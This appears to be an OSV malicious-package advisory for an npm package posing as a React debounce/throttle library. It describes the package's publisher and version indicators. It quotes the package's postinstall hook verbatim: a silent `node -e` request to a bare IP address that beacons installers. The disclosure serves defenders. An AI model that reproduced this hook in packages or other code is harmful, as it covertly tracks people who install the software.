{"id":"MAL-2026-5909","summary":"Malicious code in react-hook-use-debounce-throttle-12 (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af)\npackage.json declares a postinstall hook that runs `node -e` to issue an HTTPS request to the bare IP 8.140.205.78 on port 80 with all errors silently swallowed: `require('https').request({hostname:'8.140.205.78',port:80,path:'/',method:'GET',timeout:3000}).on('error',function(){}).end()`. The package advertises itself as a React debounce/throttle hooks library and has no legitimate need for network activity at install time. The destination is a bare IPv4 address with no TLS, no publisher correlation, and no documented purpose; the request fires unconditionally on every `npm install`, leaking the installer's IP, install timing, and machine footprint to the operator of that host. Author metadata is a generic placeholder (`dev-utils \u003cdev@utils-lib.dev\u003e`) with a repository URL that does not resolve to a real project, and the package name carries a numeric suffix consistent with disposable republishes. The combination of an install-time beacon to attacker-controlled infrastructure, mismatched purpose, silent error handling, and placeholder publisher identity is a victim-enumeration/install-tracking attack.\n","modified":"2026-06-16T23:16:56.517931088Z","published":"2026-06-16T17:24:02Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.0.0"],"modified_time":"2026-06-16T17:24:02Z","id":"IN-MAL-2026-006801","sha256":"f7491b25e457c908dae1b32fe800f461843e4463807c8590044e4b7cc769843a","import_time":"2026-06-16T18:10:21.109051992Z"},{"source":"amazon-inspector","versions":["1.0.2"],"modified_time":"2026-06-16T22:30:57Z","id":"IN-MAL-2026-006852","sha256":"882aa89fb511fb5cfe781f6b4242ae72abb1d089ec9b619056341a5f244183e2","import_time":"2026-06-16T23:03:43.924049399Z"},{"source":"amazon-inspector","versions":["1.0.1"],"modified_time":"2026-06-16T22:30:59Z","sha256":"b0a4d8a0470a3e7fcb2da7cdb29ba6412125924a486aa6f4a437ccfbeb5ca4af","id":"IN-MAL-2026-006856","import_time":"2026-06-16T23:03:44.221726355Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-hook-use-debounce-throttle-12/v/1.0.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-hook-use-debounce-throttle-12/v/1.0.2"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-hook-use-debounce-throttle-12/v/1.0.1"}],"affected":[{"package":{"name":"react-hook-use-debounce-throttle-12","ecosystem":"npm","purl":"pkg:npm/react-hook-use-debounce-throttle-12"},"versions":["1.0.0","1.0.2","1.0.1"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-hook-use-debounce-throttle-12/MAL-2026-5909.json","cwes":[{"cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature.","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-I5aCPxI0OkhvQfYyEnKGib+FWXhwHs0GxDpajWZjtlpS5EHNAJpYMRLr1LH8Veq8fQaqlu3Uly6rLXFLAELqEw==","sha1":"51385b702bfd7eb72ff1912ec3d19b3015cccb14"},"filename":"react-hook-use-debounce-throttle-12-1.0.0.tgz"}],"evidence_files":[{"path":"package.json","tlsh":"dc01f1b58460daa31fd495955d5a294ae6320c0f401c7c18e3d3803c87cd6ae687c6ae","sha256":"2a569500b2facf7961423e147d69add31f30eb0c39f9740f8f6d95b38519e946"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}